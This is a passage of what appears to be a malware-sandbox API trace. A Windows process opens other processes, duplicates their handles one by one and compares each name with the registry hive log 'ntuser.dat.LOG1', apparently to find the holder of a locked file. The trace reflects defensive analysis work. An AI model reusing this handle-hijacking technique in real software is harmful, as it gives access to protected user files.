lpExitCode=0x3fed80) returned 1 [0151.577] CloseHandle (hObject=0x670) returned 1 [0151.577] CloseHandle (hObject=0x680) returned 1 [0151.577] CloseHandle (hObject=0x62c) returned 1 [0151.577] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0151.577] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x168, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.577] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.578] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.578] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.578] CloseHandle (hObject=0x670) returned 1 [0151.578] CloseHandle (hObject=0x680) returned 1 [0151.578] CloseHandle (hObject=0x62c) returned 1 [0151.578] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0151.578] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x170, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.579] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.579] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.580] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.580] CloseHandle (hObject=0x670) returned 1 [0151.580] _wcsicmp (_Str1="\\CatalogChangeListener-294-0", _Str2="\\ntuser.dat.LOG1") returned -11 [0151.580] CloseHandle (hObject=0x680) returned 1 [0151.580] CloseHandle (hObject=0x62c) returned 1 [0151.580] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0151.580] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x174, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.580] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.581] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.581] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.581] CloseHandle (hObject=0x670) returned 1 [0151.581] CloseHandle (hObject=0x680) returned 1 [0151.582] CloseHandle (hObject=0x62c) returned 1 [0151.582] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0151.582] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x17c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.582] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.582] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.583] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.583] CloseHandle (hObject=0x670) returned 1 [0151.583] CloseHandle (hObject=0x680) returned 1 [0151.583] CloseHandle (hObject=0x62c) returned 1 [0151.583] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0151.583] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x180, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.583] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.584] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.585] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.585] CloseHandle (hObject=0x670) returned 1 [0151.585] CloseHandle (hObject=0x680) returned 1 [0151.586] CloseHandle (hObject=0x62c) returned 1 [0151.586] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0151.586] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x184, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.586] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.586] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.587] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.587] CloseHandle (hObject=0x670) returned 1 [0151.587] CloseHandle (hObject=0x680) returned 1 [0151.587] CloseHandle (hObject=0x62c) returned 1 [0151.587] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0151.587] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.587] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.588] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.589] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.589] CloseHandle (hObject=0x670) returned 1 [0151.589] CloseHandle (hObject=0x680) returned 1 [0151.589] CloseHandle (hObject=0x62c) returned 1 [0151.589] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0151.589] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.589] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.589] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.591] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.591] CloseHandle (hObject=0x670) returned 1 [0151.591] CloseHandle (hObject=0x680) returned 1 [0151.591] CloseHandle (hObject=0x62c) returned 1 [0151.591] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0151.591] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.591] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.592] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.593] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.593] CloseHandle (hObject=0x670) returned 1 [0151.593] _wcsicmp (_Str1="\\epmapper", _Str2="\\ntuser.dat.LOG1") returned -9 [0151.593] CloseHandle (hObject=0x680) returned 1 [0151.593] CloseHandle (hObject=0x62c) returned 1 [0151.593] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0151.593] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.593] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.594] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.595] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.595] CloseHandle (hObject=0x670) returned 1 [0151.596] _wcsicmp (_Str1="\\epmapper", _Str2="\\ntuser.dat.LOG1") returned -9 [0151.596] CloseHandle (hObject=0x680) returned 1 [0151.596] CloseHandle (hObject=0x62c) returned 1 [0151.596] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x62c [0151.596] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.596] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.596] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.597] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.597] CloseHandle (hObject=0x670) returned 1 [0151.598] _wcsicmp (_Str1="\\epmapper", _Str2="\\ntuser.dat.LOG1") returned -9 [0151.598] CloseHandle (hObject=0x680) returned 1 [0151.598] CloseHandle (hObject=0x62c) returned 1 [0151.598] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.598] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.598] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.598] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.599] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.599] CloseHandle (hObject=0x670) returned 1 [0151.600] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.600] CloseHandle (hObject=0x680) returned 1 [0151.600] CloseHandle (hObject=0x62c) returned 1 [0151.600] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.600] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.600] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.600] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.606] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.606] CloseHandle (hObject=0x670) returned 1 [0151.606] CloseHandle (hObject=0x680) returned 1 [0151.606] CloseHandle (hObject=0x62c) returned 1 [0151.606] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.606] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x124, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.606] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.607] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.608] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.608] CloseHandle (hObject=0x670) returned 1 [0151.608] _wcsicmp (_Str1="\\eventlog", _Str2="\\ntuser.dat.LOG1") returned -9 [0151.608] CloseHandle (hObject=0x680) returned 1 [0151.608] CloseHandle (hObject=0x62c) returned 1 [0151.608] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.608] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x128, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.609] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.609] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.611] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.611] CloseHandle (hObject=0x670) returned 1 [0151.611] _wcsicmp (_Str1="\\eventlog", _Str2="\\ntuser.dat.LOG1") returned -9 [0151.611] CloseHandle (hObject=0x680) returned 1 [0151.611] CloseHandle (hObject=0x62c) returned 1 [0151.611] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.611] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x12c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.611] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.612] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.613] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.613] CloseHandle (hObject=0x670) returned 1 [0151.613] _wcsicmp (_Str1="\\eventlog", _Str2="\\ntuser.dat.LOG1") returned -9 [0151.613] CloseHandle (hObject=0x680) returned 1 [0151.613] CloseHandle (hObject=0x62c) returned 1 [0151.613] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.613] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x150, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.613] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.614] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.615] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.615] CloseHandle (hObject=0x670) returned 1 [0151.615] _wcsicmp (_Str1="\\lastalive1.dat", _Str2="\\ntuser.dat.LOG1") returned -2 [0151.615] CloseHandle (hObject=0x680) returned 1 [0151.616] CloseHandle (hObject=0x62c) returned 1 [0151.616] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.616] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.616] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.616] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.618] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.618] CloseHandle (hObject=0x670) returned 1 [0151.618] _wcsicmp (_Str1="\\lastalive0.dat", _Str2="\\ntuser.dat.LOG1") returned -2 [0151.618] CloseHandle (hObject=0x680) returned 1 [0151.618] CloseHandle (hObject=0x62c) returned 1 [0151.618] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.618] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.618] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.619] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.621] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.621] CloseHandle (hObject=0x670) returned 1 [0151.621] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0151.621] CloseHandle (hObject=0x680) returned 1 [0151.621] CloseHandle (hObject=0x62c) returned 1 [0151.621] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.621] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x160, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.621] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.622] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.623] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.623] CloseHandle (hObject=0x670) returned 1 [0151.623] CloseHandle (hObject=0x680) returned 1 [0151.623] CloseHandle (hObject=0x62c) returned 1 [0151.623] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.623] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x194, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.623] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.625] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.626] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.626] CloseHandle (hObject=0x670) returned 1 [0151.626] _wcsicmp (_Str1="\\CatalogChangeListener-2c8-0", _Str2="\\ntuser.dat.LOG1") returned -11 [0151.626] CloseHandle (hObject=0x680) returned 1 [0151.626] CloseHandle (hObject=0x62c) returned 1 [0151.626] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.627] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x198, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.627] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.627] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.628] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.628] CloseHandle (hObject=0x670) returned 1 [0151.629] _wcsicmp (_Str1="\\wkssvc", _Str2="\\ntuser.dat.LOG1") returned 9 [0151.629] CloseHandle (hObject=0x680) returned 1 [0151.629] CloseHandle (hObject=0x62c) returned 1 [0151.629] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.629] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x19c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.629] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.629] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.631] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.631] CloseHandle (hObject=0x670) returned 1 [0151.631] CloseHandle (hObject=0x680) returned 1 [0151.631] CloseHandle (hObject=0x62c) returned 1 [0151.631] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.631] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.631] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.632] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.634] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.634] CloseHandle (hObject=0x670) returned 1 [0151.634] CloseHandle (hObject=0x680) returned 1 [0151.634] CloseHandle (hObject=0x62c) returned 1 [0151.634] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.634] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.634] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.635] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.636] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.636] CloseHandle (hObject=0x670) returned 1 [0151.636] CloseHandle (hObject=0x680) returned 1 [0151.636] CloseHandle (hObject=0x62c) returned 1 [0151.636] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.636] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.636] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.637] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.638] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.638] CloseHandle (hObject=0x670) returned 1 [0151.638] _wcsicmp (_Str1="\\System.evtx", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.638] CloseHandle (hObject=0x680) returned 1 [0151.638] CloseHandle (hObject=0x62c) returned 1 [0151.638] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.639] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.639] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.639] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.640] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.641] CloseHandle (hObject=0x670) returned 1 [0151.641] _wcsicmp (_Str1="\\Application.evtx", _Str2="\\ntuser.dat.LOG1") returned -13 [0151.641] CloseHandle (hObject=0x680) returned 1 [0151.641] CloseHandle (hObject=0x62c) returned 1 [0151.641] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0151.641] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.641] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.641] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.642] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.643] CloseHandle (hObject=0x670) returned 1 [0151.643] _wcsicmp (_Str1="\\Internet Explorer.evtx", _Str2="\\ntuser.dat.LOG1") returned -5 [0151.643] CloseHandle (hObject=0x680) returned 1 [0151.643] CloseHandle (hObject=0x62c) returned 1 [0151.643] OpenProcess 